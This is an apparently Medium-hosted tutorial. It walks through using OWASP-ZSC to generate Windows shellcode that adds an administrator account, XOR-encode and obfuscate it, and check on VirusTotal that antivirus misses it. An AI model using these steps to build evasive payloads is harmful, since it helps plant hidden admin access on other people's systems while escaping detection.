How I bypass malware detection using Obfuscation

Akshay Jain
4 min readAug 4, 2019

--

Every day thousands of malware are released online malware wants to stay hidden during infection and operation to prevent removal and analysis, this Malware achieves this using many techniques to bypass detection one of the method is obfuscation this method can be used to cover filename/signature, changing the malware attributes or other methods, it can also be defined as a practice of making something difficult to understand.

Lets Start!

An attacker will typically employ file-less Malware like Shellcode(a piece of binary data that is meant to be executed by a process) to avoid detection but modern Anti-virus engines are much smarter at detecting potential threats, they also respond much quicker. As soon as your code behavior is something too malicious-looking its either blocked or tossed out from your system.

Let’s see an examples of practical obfuscation used in various malware today.

Generating a Payload

shellcode can be generated from the various frameworks.

Step1:- Run Kali Linux os and download OWASP-ZSC, OWASP-ZSC is not built-in Kali Linux so it needs to be downloaded externally from github.com

root@kali:~# git clone https://github.com/zscproject/OWASP-ZSC

OWASP-ZSC is downloaded using git

Step 2:- Move the terminal to the OWASP-ZSC folder

root@kali: > cd OWASP-ZSC

Step 3:- Now run the following command in the terminal

root@kali:# ./installer.py

This command runs the predefined instruction which

Step 4:- The below command allows running the tool easily by typing zsc on the terminal

root@kali:#zsc

Step 5:-Now, let’s generate some shellcode.

zsc> shellcode
zsc/shellcode> generate

OWASP-ZSC uses the TAB key to show options for any command, so now we use the TAB to show the shellcode options.

As you can see below, OWASP_ZSC has three OS shellcode options, linux_x86, osx_x86 and windows_x86. Since most of us use windows operating system

zsc/shellcode/generate>windows_x86

selecting an operating system for generating OS

Step 6:- Now to generate shellcode for windows_x86 so we press tab and select shellcode from the option

zsc/shellcode/generate>windows_x86>add_admin

Select the type of shellcode you want to generate

Step 7:-you can also search for various shellcode from the www.shell-storm.org and shell-storm.org to increase the shellcode spectrum

zsc/shellcode/generate/windows_x86/add_admin> username&&password

enter username and password

Enter the username and password

Step 8:- Now select the type of method you want to chose to encode with random XOR (xor_random). The random encodes produce shellcode that is different each time making it more likely to be undetected by AV.

zsc/shellcode/generate/windows_x86/add_admin/encode_type> xor_random

type Y for displaying the assembly code

step 9:- OWASP-ZSC prompts whether you want to output the assembly code and whether I want to output my shellcode to the screen.

you can see the assembly code below

Step 10:- The process of obfuscation is an attempt to hide the real purpose of the code and making it hard to read or reverse engineer the file-less malware. (obfuscation)

next, we start the obfuscation process

zsc > obfuscate

javascript, Perl, PHP, python, ruby are the available options

Step 11:- Now to generate an encoded shellcode we select the type of encoding from the options

we encode our shellcode with available methods

below you can see the Assembly code generated after the xor_random obfuscation

you can check the complete code at https://pastebin.com/MvxpcuMp

its time to test our shellcode whether it is detected by any antivirus to test the shellcode you can visit www.virustotal.com and upload the shellcode and scan

the obfuscated shellcode was undetected
the generated report states a suspicious detection to know more about you can visit the reference link

Wanna connect:

Linkedin: https://www.linkedin.com/in/akshay-jain-533a79111/

Twitter: https://twitter.com/Akshayjain890

Email: Akshayjain5@protonmail.com

you can also visit my GitHub account: https://github.com/akshay1729

--

--